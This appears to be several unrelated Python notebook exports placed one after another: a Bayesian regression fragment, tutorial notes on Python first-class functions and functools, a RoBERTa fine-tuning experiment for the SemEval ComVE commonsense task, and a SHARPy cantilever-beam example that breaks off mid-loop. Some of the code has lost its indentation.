conf_bound3 = 2.0*np.sqrt(var_blr).flatten() + 2.0*beta
plt.fill_between(Xtest.flatten(), mean_blr.flatten() + conf_bound1,
mean_blr.flatten() - conf_bound1, alpha = 0.1, color="k")
plt.fill_between(Xtest.flatten(), mean_blr.flatten() + conf_bound2,
mean_blr.flatten() - conf_bound2, alpha = 0.1, color="k")
plt.fill_between(Xtest.flatten(), mean_blr.flatten() + conf_bound3,
mean_blr.flatten() - conf_bound3, alpha = 0.1, color="k")
plt.legend(["Training data", "MLE", "MAP", "BLR"])
plt.xlabel('$x$');
plt.ylabel('$y$');
# -
def gradient_decent(previous_alpha, previous_beta, learning_rate, epoch):
alpha_gd = []
beta_gd = []
lml_gd = []
# randomly initialize a value to X
N = 25
X = np.linspace(0,0.9,N).reshape(N,1)
Y = f(X)
Phi = poly_features(X, 1)
alpha_gd.append(previous_alpha[0])
beta_gd.append(previous_beta[0])
lml_gd.append(lml(previous_alpha, previous_beta, Phi, Y))
# begin the loops to update x, y and z
for i in range(epoch):
grad = grad_lml(previous_alpha, previous_beta, Phi, Y)
current_alpha = previous_alpha - learning_rate*grad[0]
alpha_gd.append(current_alpha[0][0])
current_beta = previous_beta - learning_rate*grad[1]
beta_gd.append(current_beta[0][0])
lml_gd.append(lml(current_alpha, current_beta, Phi, Y))
# update previous_x and previous_y
previous_alpha = current_alpha
previous_beta = current_beta
return alpha_gd, beta_gd, lml_gd
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # First-Class Functions
#
# Functions in Python are first-class objects.
#
# ## First-class objects
#
# A first-class object:
# - is created at runtime
# - can be assigned to a variable or to an element of a data structure
# - can be passed as an argument to a function
# - can be returned as the result of a function
#
#
# +
def factorial(n):
'''return n!'''
return 1 if n < 2 else n * factorial(n-1)
# Treat the function as an object and pass it to another function:
list(map(factorial, range(11)))
# -
dir(factorial)
#
# ## Callable objects
#
# - User-defined functions: created with def or lambda
# - Built-in functions
# - Built-in methods
# - Methods: functions defined in the body of a class
# - Classes: \_\_new\_\_ creates an instance; \_\_init\_\_ initializes it; with \_\_call\_\_ an instance can be invoked like a function
# - Generator functions: functions or methods that use yield; they return a generator object (Chapter 14)
# +
# callable
import random
class BingoCage:
def __init__(self, items):
self._items = list(items)
random.shuffle(self._items)
def pick(self):
try:
return self._items.pop()
except IndexError:
raise LookupError('pick from an empty BingoCage')
def __call__(self):
'''
An instance is callable only if its class defines __call__.
'''
return self.pick()
bingo = BingoCage(range(3))
bingo.pick()
# -
bingo()
callable(bingo)
dir(BingoCage)
# ## Function introspection
# +
class C: pass  # a user-defined class
obj = C()  # an instance of the class
def func(): pass  # a user-defined function
sorted(set(dir(func)) - set(dir(obj)))  # attributes of functions that plain instances lack
# -
# ### Function-specific attributes
# | Name | Type | Description |
# |:--------------------|:----|:----|
# | \_\_annotations\_\_ | dict | parameter and return annotations |
# |\_\_call\_\_ |method-wrapper|implementation of the () operator, i.e. the callable protocol|
# |\_\_closure\_\_ |tuple|the function closure, i.e. bindings for free variables (often None)|
# |\_\_code\_\_ |code|function metadata and function body compiled into bytecode
# |\_\_defaults\_\_ |tuple|default values for the formal parameters
# |\_\_get\_\_ |method-wrapper|implementation of the read-only descriptor protocol (Chapter 20)
# |\_\_globals\_\_ |dict|global variables of the module where the function is defined
# |\_\_kwdefaults\_\_ |dict|default values for keyword-only parameters
# |\_\_name\_\_ |str|the function name
# |\_\_qualname\_\_ |str|the qualified function name
# ## Function parameters
#
# - Keyword-only arguments
# - \* captures any number of unnamed positional arguments into a tuple
# - \*\* captures any number of named keyword arguments into a dict
#
#
#
#
#
def tag(name, *content, cls=None, **attrs):
"""Generate one or more HTML tags"""
if cls is not None:
attrs['class'] = cls
if attrs:
attr_str = ''.join(' %s="%s"'%(attr, value)
for attr, value
in sorted(attrs.items()))
else:
attr_str = ''
if content:
return '\n'.join('<%s%s>%s</%s>'%(name, attr_str, c, name)
for c in content)
else:
return '<%s%s />'%(name, attr_str)
# A single positional argument produces an empty tag with that name.
# name = 'br'
tag('br')
# Any number of arguments after the first are captured by *content as a tuple.
# name = 'p'
# content = ('hello')
tag('p', 'hello')
# name = 'p'
# content = ('hello', 'world')
tag('p', 'hello', 'world')
# +
# Keyword arguments not explicitly named in the signature of tag are captured by **attrs as a dict.
# name = 'p'
# content = ('hello')
# attrs['id'] = 33
tag('p', 'hello', id=33)
# +
# The cls parameter can only be passed as a keyword argument.
# name = 'p'
# content = ('hello', 'world')
# cls = 'sidebar'
print(tag('p', 'hello', 'world', cls='sidebar'))
# +
# When calling tag, even the first positional parameter can be passed as a keyword argument.
# name = 'img'
# attrs['content'] = 'testing'
tag(content='testing', name="img")
# +
# Prefixing my_tag with ** passes every item in the dict as a separate argument;
# keys matching named parameters bind to them, and the rest are captured by **attrs.
# name = 'img'
# attrs['title'] = 'Sunset Buolevard'
# attrs['src'] = 'sunset.jpg'
# cls = 'framed'
my_tag = {'name':'img', 'title':'Sunset Buolevard',
'src':'sunset.jpg', 'cls':'framed'}
tag(**my_tag)
# -
# To specify keyword-only parameters when defining a function (like *cls* above), place them after the parameter prefixed with \*. To support keyword-only arguments without accepting a variable number of positional arguments, put a bare \* in the signature, as shown here:
# +
def f(a, *, b):
return a,b
f(1, b=2)  # b must be passed as a keyword argument
# -
# # Retrieving information about parameters
#
# +
def clip(text, max_len = 80):
"""
Truncate text at the first space before or after max_len.
"""
end = None
if len(text) > max_len:
space_before = text.rfind(' ', 0, max_len)
if space_before >= 0:
end = space_before
else:
space_after = text.rfind(' ', max_len)
if space_after >= 0:
end = space_after
if end == None:
end = len(text)
return text[:end].rstrip()
clip('I will learn python by myself every night.', 18)
# -
'''
Function object attributes:
__defaults__: a tuple of default values for positional and keyword parameters
__kwdefaults__: default values for keyword-only parameters
Default values can only be matched to parameters by their position in the
__defaults__ tuple, so you have to scan from last to first to pair them up.
In this example clip has two parameters, text and max_len, and one default,
80, which must therefore belong to the last parameter, max_len.
This is counterintuitive.
'''
clip.__defaults__
"""
__code__.co_varnames: the parameter names, but local variable names are included too
"""
clip.__code__.co_varnames
"""
__code__.co_argcount: combined with co_varnames above, this identifies the parameters.
Note that the count does not include parameters prefixed with * or **.
"""
clip.__code__.co_argcount
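# The right-alignment rule can be made explicit by zipping the tail of the
# parameter names with \_\_defaults\_\_ (a standalone sketch using a stub clip):

```python
def clip(text, max_len=80):
    pass

# __defaults__ aligns with the *last* positional parameters,
# so pair names and defaults from the end
argcount = clip.__code__.co_argcount
names = clip.__code__.co_varnames[:argcount]
defaults = clip.__defaults__
pairs = dict(zip(names[-len(defaults):], defaults))
print(pairs)  # {'max_len': 80}
```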
# ## Extracting the function signature with the inspect module
# +
from inspect import signature
sig = signature(clip)
sig
# -
for name, param in sig.parameters.items():
print (param.kind, ":", name, "=", param.default)
# If a parameter has no default, inspect.\_empty is returned, because None is itself a valid value.
# | kind | meaning |
# | :--- | ------: |
# |POSITIONAL_OR_KEYWORD | may be passed positionally or as a keyword (most parameters) |
# |VAR_POSITIONAL| a tuple of positional arguments |
# |VAR_KEYWORD| a dict of keyword arguments |
# |KEYWORD_ONLY| keyword-only parameter (new in Python 3) |
# |POSITIONAL_ONLY| positional-only; Python 3.8 added the / syntax for declaring these |
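# A Signature object can also validate and bind arguments before a call, which
# is the same mechanism frameworks use. A standalone sketch with a stub of the
# tag function from earlier:

```python
import inspect

def tag(name, *content, cls=None, **attrs):
    pass

sig = inspect.signature(tag)
my_tag = {'name': 'img', 'title': 'Sunset Boulevard',
          'src': 'sunset.jpg', 'cls': 'framed'}
bound = sig.bind(**my_tag)
print(bound.arguments)
# {'name': 'img', 'cls': 'framed',
#  'attrs': {'title': 'Sunset Boulevard', 'src': 'sunset.jpg'}}
```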
# # Function annotations
"""
When a function has no annotations, an empty dict is returned
"""
clip.__annotations__
def clip_ann(text:str, max_len:'int > 0' = 80) -> str:
"""
Truncate text at the first space before or after max_len.
"""
end = None
if len(text) > max_len:
space_before = text.rfind(' ', 0, max_len)
if space_before >= 0:
end = space_before
else:
space_after = text.rfind(' ', max_len)
if space_after >= 0:
end = space_after
if end == None:
end = len(text)
return text[:end].rstrip()
clip_ann.__annotations__
# The only thing Python does with annotations is store them in the function's
# __annotations__ attribute. Nothing more: Python does not check, enforce, or
# validate them. In other words, annotations mean nothing to the Python interpreter. They are just metadata that tools such as IDEs, frameworks, and decorators may use.
# # Functional programming
#
# Two packages are involved:
# - operator
# - functools
# ## operator
# ### Using mul to replace the * (multiplication) operator
# +
# How to use an operator as a function
# The traditional approach:
from functools import reduce
def fact(n):
return reduce(lambda a,b: a*b, range(1,n+1))
fact(5)
# +
# With the operator module we can avoid the anonymous function
from functools import reduce
from operator import mul
def fact_op(n):
return reduce(mul, range(1,n+1))
fact_op(5)
# -
# ### Using itemgetter in place of the [] indexing operator
# +
metro_data = [
('Tokyo', 'JP', 36.933, (35.689722, 139.691667)),
('Delhi NCR', 'IN', 21.935, (28.613889, 77.208889)),
('Mexico City', 'MX', 20.142, (19.433333, -99.133333)),
('New York-Newark', 'US', 20.104, (40.808611, -74.020386)),
('Sao Paulo', 'BR', 19.649, (-23.547778, -46.635833)),
]
from operator import itemgetter
for city in sorted(metro_data, key = itemgetter(1)):
print(city)
# Here itemgetter(1) is equivalent to lambda fields: fields[1]
# -
cc_name = itemgetter(1, 0)  # returns a tuple of the extracted values
for city in metro_data:
print( cc_name(city) )
# ### Using attrgetter to read named attributes, like var.attr (the dot operator)
# +
from collections import namedtuple
metro_data = [
('Tokyo', 'JP', 36.933, (35.689722, 139.691667)),
('Delhi NCR', 'IN', 21.935, (28.613889, 77.208889)),
('Mexico City', 'MX', 20.142, (19.433333, -99.133333)),
('New York-Newark', 'US', 20.104, (40.808611, -74.020386)),
('Sao Paulo', 'BR', 19.649, (-23.547778, -46.635833)),
]
LatLog = namedtuple('LatLong','lat long')
Metropolis = namedtuple('Metropolis', 'name cc pop coord')
metro_areas = [Metropolis(name, cc, pop, LatLog(lat, long)) for name, cc
, pop, (lat, long) in metro_data]
# the dot operator
metro_areas[0].coord.lat
# +
# Use an operator-module function in place of the operator
from operator import attrgetter
name_lat = attrgetter('name', 'coord.lat')
# sort by the lat coordinate
for city in sorted(metro_areas, key = attrgetter('coord.lat')):
print(name_lat(city))
# -
# ### methodcaller calls the named method on its argument
# +
from operator import methodcaller
s = 'The time has come'
# upcase can be viewed as a freshly created function
upcase = methodcaller('upper')  # name the method to call
upcase(s)
# +
# Freezing arguments: replace(s, ' ', '-') ---> partial application
hiphenate = methodcaller('replace', ' ','-')
hiphenate(s)
# -
# ### The functions available in operator
import operator
funcs = [name for name in dir(operator) if not name.startswith('_')]
for func in funcs:
print(func)
# ## functools
# ### functools.partial freezes arguments
#
# The first argument to partial is a callable, followed by any number of positional and keyword arguments to bind.
# +
from operator import mul
from functools import partial
# freeze one argument of mul(a, b) to 3
triple = partial(mul, 3)
triple(7)
# -
# Useful where an API only accepts a one-argument function
list(map(triple,range(1,10)))
# ### Normalizing text with functools.partial
# +
# For calls we make frequently, freezing the arguments once is more convenient
import unicodedata, functools
# distill the common call unicodedata.normalize('NFC', s)
nfc = functools.partial(unicodedata.normalize, 'NFC')
s1 ='café'
s2 = 'cafe\u0301'
s1 == s2
# -
nfc(s1) == nfc(s2)
# +
def tag(name, *content, cls=None, **attrs):
"""Generate one or more HTML tags"""
if cls is not None:
attrs['class'] = cls
if attrs:
attr_str = ''.join(' %s="%s"'%(attr, value)
for attr, value
in sorted(attrs.items()))
else:
attr_str = ''
if content:
return '\n'.join('<%s%s>%s</%s>'%(name, attr_str, c, name)
for c in content)
else:
return '<%s%s />'%(name, attr_str)
# Partially freezing tag's arguments makes it more convenient to use:
from functools import partial
picture = partial(tag, 'img', cls='pic-frame')
picture(src = 'wum.jpeg')
# -
picture
picture.func
tag
picture.args
picture.keywords
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Experiment on Subtask A: Validation
# Updated on August 20, 2021.
#
# #### Project Information:
# * Summer Project: Commonsense Validation and Explanation in Natural Language Processing<br>
# * Objective Task: SemEval 2020 Task 4 - Commonsense Validation and Explanation (ComVE)<br>
# * Supervisor: Dr <NAME><br>
# * Student: <NAME> (2214560)
#
# #### Task Description:
# The subtask A is a validation task. The purpose is to determine which of two similar natural language statements is against common sense.
#
# *Example:*
# > Task: Which of the two statements is against common sense?
# > Statement1: He put a turkey into the fridge.
# > Statement2: He put an elephant into the fridge.
#
# #### Solution:
# The experiment will follow the steps:
# 1. General Preparation
# 2. Data Processing
# 3. Loading the Model and Optimizer
# 4. Training and Evaluation
# 5. Experiment
# ## 1. General Preparation
# Import some common libraries.
from tqdm import tqdm
import time
# Use GPU Facilities.
import torch
cuda_id = 3
device = torch.device("cuda:%s" % cuda_id if torch.cuda.is_available() else "cpu")
device_name = torch.cuda.get_device_name(cuda_id) if torch.cuda.is_available() else "cpu"
print("We are using the device %s - %s" % (device, device_name))
# Use TensorBoard to record and visualize the results of the experiment.
# +
from torch.utils.tensorboard import SummaryWriter
# Set TensorBoard
writer_tensorboard = SummaryWriter('./TensorBoard/SubtaskA')
# -
# ## 2. Data Processing
# ### 2.1 Read data from csv
# Build a common function to get texts and labels from csv file.
import pandas as pd
def get_info_from_csv(texts_path, labels_path):
texts = pd.read_csv(texts_path, header=0, names=['ID', 'Statement 0', 'Statement 1'])
labels = pd.read_csv(labels_path, header=None, names=['ID', 'Answer'])['Answer']
return texts, labels
# Read texts and labels from csv file.
# +
train_texts, train_labels = get_info_from_csv(
'../DataSet/Training Data/subtaskA_data_all.csv',
'../DataSet/Training Data/subtaskA_answers_all.csv'
)
val_texts, val_labels = get_info_from_csv(
'../DataSet/Dev Data/subtaskA_dev_data.csv',
'../DataSet/Dev Data/subtaskA_gold_answers.csv'
)
test_texts, test_labels = get_info_from_csv(
'../DataSet/Test Data/subtaskA_test_data.csv',
'../DataSet/Test Data/subtaskA_gold_answers.csv'
)
# -
# Let's have a look at the training data.
train_data = pd.concat([train_texts, train_labels], axis=1)
train_data.head()
# ### 2.2 Tokenization
# Define a function to get a tokenizer.
# +
from transformers import BertTokenizerFast, DistilBertTokenizerFast, RobertaTokenizerFast
def get_tokenizer(model_name):
if model_name.startswith("bert"):
return BertTokenizerFast.from_pretrained(model_name)
if model_name.startswith("distilbert"):
return DistilBertTokenizerFast.from_pretrained(model_name)
if model_name.startswith("roberta"):
return RobertaTokenizerFast.from_pretrained(model_name)
# -
# Define a function to do the tokenization.
def tokenization(model_name):
# Get tokenizer
tokenizer = get_tokenizer(model_name)
# Tokenization for texts
train_encodings = tokenizer(list(train_texts["Statement 0"]), list(train_texts["Statement 1"]), truncation=True, padding=True)
val_encodings = tokenizer(list(val_texts["Statement 0"]), list(val_texts["Statement 1"]), truncation=True, padding=True)
test_encodings = tokenizer(list(test_texts["Statement 0"]), list(test_texts["Statement 1"]), truncation=True, padding=True)
return train_encodings, val_encodings, test_encodings
# ### 2.3 Turn data into a Dataset object
# Define a Dataset class.
class ComVEDataset(torch.utils.data.Dataset):
def __init__(self, encodings, labels):
self.encodings = encodings
self.labels = labels
def __getitem__(self, idx):
item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}
item['labels'] = torch.tensor(self.labels[idx])
return item
def __len__(self):
return len(self.labels)
# Define a function to get all dataset in the form of dataset objects.
# Note that, for different models, we need to use the corresponding tokenizer to process the text data.
def get_dataset(model_name):
# Tokenization for texts
train_encodings, val_encodings, test_encodings = tokenization(model_name)
# Turn encodings and labels into a Dataset object
train_dataset = ComVEDataset(train_encodings, train_labels)
val_dataset = ComVEDataset(val_encodings, val_labels)
test_dataset = ComVEDataset(test_encodings, test_labels)
dataset = {"train_dataset" : train_dataset, "val_dataset" : val_dataset, "test_dataset" : test_dataset}
return dataset
# ## 3. Loading the Model and Optimizer
# Define a function to load model.
# +
from transformers import BertForSequenceClassification, DistilBertForSequenceClassification, RobertaForSequenceClassification
def get_model(model_name):
if model_name.startswith("bert"):
model = BertForSequenceClassification.from_pretrained(model_name)
if model_name.startswith("distilbert"):
model = DistilBertForSequenceClassification.from_pretrained(model_name)
if model_name.startswith("roberta"):
model = RobertaForSequenceClassification.from_pretrained(model_name)
model.to(device)
return model
# -
# Define a function to load optimizer.
# +
from transformers import AdamW
def get_optimizer(model, optimizer_name, learning_rate):
if optimizer_name == "Adam":
return AdamW(model.parameters(), lr=learning_rate)
# -
# ## 4. Training and Evaluation
# Prepare some utility functions.
# Prediction function
def predict(outputs):
probabilities = torch.softmax(outputs["logits"], dim=1)
predictions = torch.argmax(probabilities, dim=1)
return predictions
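# The same argmax-of-softmax logic, illustrated in plain NumPy (a standalone
# sketch, not the training code): softmax is monotonic, so taking the argmax of
# the probabilities picks the same class as the argmax of the raw logits.

```python
import numpy as np

def predict_np(logits):
    # numerically stable softmax followed by argmax over classes
    exp = np.exp(logits - logits.max(axis=1, keepdims=True))
    probabilities = exp / exp.sum(axis=1, keepdims=True)
    return probabilities.argmax(axis=1)

logits = np.array([[2.0, -1.0],   # model favours class 0
                   [0.5,  3.0]])  # model favours class 1
print(predict_np(logits))  # [0 1]
```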
# +
# Plot function
import matplotlib.pyplot as plt
def plot_loss_and_acc(train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list, save_name=None):
'''
Plot 1: Iteration vs Loss
'''
name = save_name.split("/")[-1]
print(name)
# X-axis
    # X-axis for the validation loss: there is one val_loss per epoch but
    # len(train_dataset)/batch_size train_loss values per epoch, and that
    # ratio equals len(train_loss_list)/len(val_loss_list)
    val_loss_X = (np.arange(len(val_loss_list)) + 1) * int(len(train_loss_list) / len(val_loss_list))
# plot minimum point of validation loss
epoch_of_min_loss = np.argmin(val_loss_list)
val_loss_min_point = (val_loss_X[epoch_of_min_loss], min(val_loss_list))
plt.axvline(x=val_loss_min_point[0], color='gray' , linestyle='--', linewidth=0.8)
# plt.axhline(y=val_loss_min_point[1], color='gray' , linestyle='--', linewidth=0.8)
plt.text(x=val_loss_min_point[0]*1.05, y=max(val_loss_list), s="epoch:%s" % (epoch_of_min_loss+1), va="top")
# plot curve
plt.plot(train_loss_list, label="Training Loss")
plt.plot(val_loss_X, val_loss_list, label="Validation Loss")
plt.xlabel("Iteration")
plt.ylabel("Loss")
plt.title("Loss vs. Iteration")
plt.legend()
# save the figure and display it
if store_img and save_name:
plt.savefig(save_name + "_Loss.png")
plt.show()
'''
Plot 2: Epoch vs Accuracy
'''
# X-axis
acc_X = np.arange(len(train_accuracy_list))+1
# plot maximum point of validation accuracy
val_acc_max_point = (acc_X[np.argmax(val_accuracy_list)], max(val_accuracy_list))
plt.axvline(x=val_acc_max_point[0], color='gray' , linestyle='--', linewidth=0.8)
plt.axhline(y=val_acc_max_point[1], color='gray' , linestyle='--', linewidth=0.8)
plt.scatter(x=val_acc_max_point[0], y=val_acc_max_point[1], color="gray")
# plt.text(x=val_acc_max_point[0]*0.98, y=val_acc_max_point[1]*1.05, s=tuple([round(x,2) for x in val_acc_max_point]), ha="right")
if val_acc_max_point[0] > len(acc_X)-3:
plt.text(x=val_acc_max_point[0]*0.98, y=val_acc_max_point[1]*0.98, s=round(val_acc_max_point[1],3),
ha="right", va="top")
else:
plt.text(x=val_acc_max_point[0]*1.02, y=val_acc_max_point[1]*0.98, s=round(val_acc_max_point[1],3),
ha="left", va="top")
# plot curve
plt.plot(acc_X, train_accuracy_list,"-", label="Training Accuracy")
plt.plot(acc_X, val_accuracy_list,"-", label="Validation Accuracy")
plt.xticks(acc_X)
plt.xlabel("Epoch")
plt.ylabel("Accuracy")
plt.title("Accuracy vs. Epoch")
plt.legend()
# save the figure and display it
if store_img and save_name:
plt.savefig(save_name + "_Accuracy.png")
plt.show()
# -
# Prepare the evaluation function.
# +
# Evaluation
import numpy as np
from torch.utils.data import DataLoader
from pandas.core.frame import DataFrame
def evaluate(model, dataset, batch_size=1, process_name=None, info=None):
# Get data by DataLoader
data_loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
# Start evaluation
model.eval()
with torch.no_grad():
correct = 0
count = 0
loss_list = list()
record = {"labels":list(), "predictions":list()}
pbar = tqdm(data_loader)
for batch in pbar:
input_ids = batch['input_ids'].to(device)
attention_mask = batch['attention_mask'].to(device)
labels = batch['labels'].to(device)
outputs = model(input_ids, attention_mask=attention_mask, labels=labels)
loss = outputs['loss']
# make predictions
predictions = predict(outputs)
# count accuracy
correct += predictions.eq(labels).sum().item()
count += len(labels)
accuracy = correct * 1.0 / count
# show progress along with metrics
pbar.set_postfix({
'Loss': '{:.3f}'.format(loss.item()),
'Accuracy': '{:.3f}'.format(accuracy),
'Process': process_name if process_name else 'Evaluation'
})
# record the loss for each batch
loss_list.append(loss.item())
# use TensorBoard to record the loss and accuracy
if store_tensorboard_event and info and process_name:
writer_tensorboard.add_scalars("Loss", {"_".join([process_name] + info[:-1]): loss.item()}, info[-1] )
writer_tensorboard.add_scalars("Accuracy", {"_".join([process_name] + info[:-1]): accuracy}, info[-1])
# record the results
record["labels"] += labels.cpu().numpy().tolist()
record["predictions"] += predictions.cpu().numpy().tolist()
pbar.close()
# Record the average loss and the final accuracy
eval_loss = np.mean(loss_list)
eval_accuracy = accuracy
    # Optionally convert the evaluation record to a pandas DataFrame:
    # df_record = DataFrame(record)
    # df_record.columns = ["Ground Truth", "Model Prediction"]
return eval_loss, eval_accuracy, record
# -
# Prepare the training function.
# +
# Training
from torch.utils.data import DataLoader
def train(model, dataset, optimizer, batch_size=16, epoch=10, loss_function=None, target=None, info=None):
    # Get training data by DataLoader
    train_dataset = dataset.get("train_dataset")
    train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
    # Start training
    model.train()
    train_loss_list = list()
    train_accuracy_list = list()
    val_loss_list = list()
    val_accuracy_list = list()
    iteration = 0
    for epoch_i in range(epoch):
        print('Epoch %s/%s' % (epoch_i + 1, epoch))
        time.sleep(0.3)
        correct = 0
        count = 0
        loss_list = list()
        pbar = tqdm(train_loader)
        for batch in pbar:
            optimizer.zero_grad()
            input_ids = batch['input_ids'].to(device)
            attention_mask = batch['attention_mask'].to(device)
            labels = batch['labels'].to(device)
            outputs = model(input_ids, attention_mask=attention_mask, labels=labels)
            loss = outputs['loss']
            loss.backward()
            optimizer.step()
            # make predictions
            predictions = predict(outputs)
            # compute the running accuracy
            correct += predictions.eq(labels).sum().item()
            count += len(labels)
            accuracy = correct * 1.0 / count
            # show progress along with metrics
            pbar.set_postfix({
                'Loss': '{:.3f}'.format(loss.item()),
                'Accuracy': '{:.3f}'.format(accuracy),
                'Process': 'Training'
            })
            # record the loss for each batch
            loss_list.append(loss.item())
            # use TensorBoard to record the loss and accuracy
            if store_tensorboard_event and info:
                iteration += 1
                writer_tensorboard.add_scalars("Loss", {"_".join(["Training"] + info): loss.item()}, iteration)
                writer_tensorboard.add_scalars("Accuracy", {"_".join(["Training"] + info): accuracy}, iteration)
        pbar.close()
        # record the training loss and accuracy for each epoch
        train_loss_list += loss_list
        train_accuracy_list.append(accuracy)
        # Evaluation on the validation dataset
        val_dataset = dataset.get("val_dataset")
        val_loss, val_accuracy, record = evaluate(model, val_dataset, batch_size=batch_size,
                                                  process_name="Validation", info=info + [iteration])
        val_loss_list.append(val_loss)
        val_accuracy_list.append(val_accuracy)
    return train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list, record
# -
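# The loop above relies on a `predict` helper that is defined elsewhere in the
# notebook. As a minimal sketch (an assumption about its behaviour, not the
# notebook's own code): if the model output dict carries a `logits` tensor of
# shape (batch_size, num_classes), the prediction is simply the argmax.

```python
import torch

def predict(outputs):
    # Hypothetical sketch of the helper used above: take the most likely
    # class from the 'logits' tensor returned by the model.
    return torch.argmax(outputs['logits'], dim=-1)
```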
# ## 5. Experiment
# +
import csv
import os
# Settings: whether to store the experiment results.
store_img = True
store_tensorboard_event = True
"""
Select the Model and the Hyperparameters
"""
# Select the model.
# Check the Pretrained models on https://huggingface.co/transformers/pretrained_models.html
# Options: ["bert-base-uncased" , "distilbert-base-uncased", "roberta-base", "roberta-large"]
model_name = "roberta-large"
# Select the optimizer.
optimizer_name = 'Adam'
# Select the loss function.
loss_name = 'CrossEntropy'
# Select the learning rate list.
# learning_rate_list = [10,1,1e-1,1e-2,1e-3,1e-4,1e-5,1e-6] # learning rate list
learning_rate_list = [1e-5] # learning rate list
# Select the batch size list.
# batch_size_list = [2,4,8,16,32,64,128,256] # batch size list
batch_size_list = [128] # batch size list
# Select the epoch.
epoch = 15
"""
Start Experiments with Selected Model and Hyperparameters.
"""
# Get the dataset via using the specific model tokenizer.
dataset = get_dataset(model_name)
# Create a directory for this experiment.
task_directory = "ExperimentResult_A"
experiment_name = "_".join([time.strftime("%Y%m%d_%H%M", time.localtime()),
model_name.title(), optimizer_name, loss_name, "Epoch=%s" % epoch])
os.makedirs("./%s/%s" % (task_directory, experiment_name))
# Experiment and store the results in a CSV file.
file_name = "./%s/%s/%s.csv" % (task_directory, experiment_name, experiment_name)
with open(file_name, 'a', newline='') as file:
    writer = csv.writer(file)
    writer.writerow(["Model", "Optimizer", "Loss Function", "Learning Rate", "Batch Size", "Test Epoch",
                     "Training Loss", "Training Accuracy", "Validation Loss", "Validation Accuracy",
                     "Highest Accuracy", "Occurred in which Epoch"])
    for learning_rate in learning_rate_list:
        for batch_size in batch_size_list:
            experiment_info = [model_name.title(), optimizer_name, loss_name,
                               "LearningRate=%s" % learning_rate, "BatchSize=%s" % batch_size, "Epoch=%s" % epoch]
            print("Experiment:", " ".join(experiment_info))
            # Initialize the model
            model = get_model(model_name)
            # Get the optimizer
            optimizer = get_optimizer(model, optimizer_name, learning_rate)
            # Training
            train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list, record = train(
                model=model,
                dataset=dataset,
                optimizer=optimizer,
                batch_size=batch_size,
                epoch=epoch,
                info=experiment_info
            )
            # Plot the result
            save_name = "./%s/%s/%s" % (task_directory, experiment_name, "_".join(experiment_info))
            plot_loss_and_acc(train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list, save_name)
            # Record the validation result
            writer.writerow([model_name.title(), optimizer_name, loss_name, learning_rate, batch_size, epoch,
                             train_loss_list, train_accuracy_list, val_loss_list, val_accuracy_list,
                             max(val_accuracy_list), np.argmax(val_accuracy_list) + 1])
            torch.cuda.empty_cache()
# +
# Display the Confusion Matrix of the last experiment result.
import seaborn as sns
# Convert test record to a pandas DataFrame object
df_record = DataFrame(record)
df_record.columns = ["Ground Truth","Model Prediction"]
# Display the Confusion Matrix
crosstab = pd.crosstab(df_record["Ground Truth"],df_record["Model Prediction"])
sns.heatmap(crosstab, cmap='Oranges', annot=True, fmt='g', linewidths=5)
accuracy = df_record["Ground Truth"].eq(df_record["Model Prediction"]).sum() / len(df_record["Ground Truth"])
plt.title("Confusion Matrix (Accuracy: %s%%)" % round(accuracy*100,2))
plt.show()
# # A prismatic cantilever beam under a tip load
#
# This is an example of the geometrically-exact beam structural solver in SHARPy.
#
# Reference:
# <NAME>., <NAME>., “Numerical Aspects of Nonlinear Flexible Aircraft Flight Dynamics Modeling.” 54th AIAA/ASME/ASCE/AHS/ASC Structures, Structural Dynamics and Materials Conference, 8-11 April 2013, Boston, Massachusetts, USA [http://hdl.handle.net/10044/1/11077, http://dx.doi.org/10.2514/6.2013-1634]
# ## Required Packages
# +
import numpy as np
import os
import matplotlib.pyplot as plt
import sharpy.sharpy_main # used to run SHARPy from Jupyter
import model_static_cantilever as model # model definition
from IPython.display import Image
plt.rcParams.update({'font.size': 20}) # Large fonts in all plots
# -
# ## Problem 1: Tip vertical dead load
# Consider first a massless beam with a heavy tip mass, such that the deformations are due to the resulting dead load P. The static equilibrium will be obtained for multiple values of P=0, 100, ..., 1000 kN
Image('images/cantilever.png', width=500)
# +
# Define temporary files to generate sharpy models.
case_name = 'temp'
route = './'
Nforces = 10        # Number of force steps
DeltaForce = 100e3  # Increment of forces
Nelem = 20          # Number of beam elements
N = 2*Nelem + 1
x1 = np.zeros((Nforces, N))
z1 = np.zeros((Nforces, N))
# Loop through all external forces
for jForce in range(Nforces):
    model.clean_test_files(route, case_name)
    model.generate_fem_file(route, case_name, Nelem, float(jForce+1)*DeltaForce)
    model.generate_solver_file(route, case_name)
    case_data = sharpy.sharpy_main.main(['', route + case_name + '.sharpy'])
    x1[jForce, 0:N] = case_data.structure.timestep_info[0].pos[:, 0]
    z1[jForce, 0:N] = case_data.structure.timestep_info[0].pos[:, 2]
#Store initial geometry
x0=case_data.structure.ini_info.pos[:, 0]
z0=case_data.structure.ini_info.pos[:, 2]
# +
# Plot the deformed beam shapes
fig= plt.subplots(1, 1, figsize=(15, 6))
plt.scatter(x0,z0,c='black')
plt.plot(x0,z0,c='black')
for jForce in range(Nforces):
    plt.scatter(x1[jForce, 0:N], z1[jForce, 0:N], c='black')
    plt.plot(x1[jForce, 0:N], z1[jForce, 0:N], c='black')
plt.axis('equal')
plt.grid()
plt.xlabel('x (m)')
plt.ylabel('z (m)')
plt.savefig("images/ncb1-dead-displ.eps", format='eps', dpi=1000, bbox_inches='tight')
# -
print('{:>8s}{:>12s}'.format('Force', 'Tip z'))
dash = 20*'-'
print(dash)
for jForce in range(Nforces):
    print('{:>8.0f}{:>12.4f}'.format((jForce+1)*DeltaForce, z1[jForce, N-1]))
model.clean_test_files(route, case_name)
# ## Problem 2: Comparing follower and dead forces
# Loop through all external follower forces, again applied at the tip.
x2 = np.zeros((Nforces, N))
z2 = np.zeros((Nforces, N))
for jForce in range(Nforces):
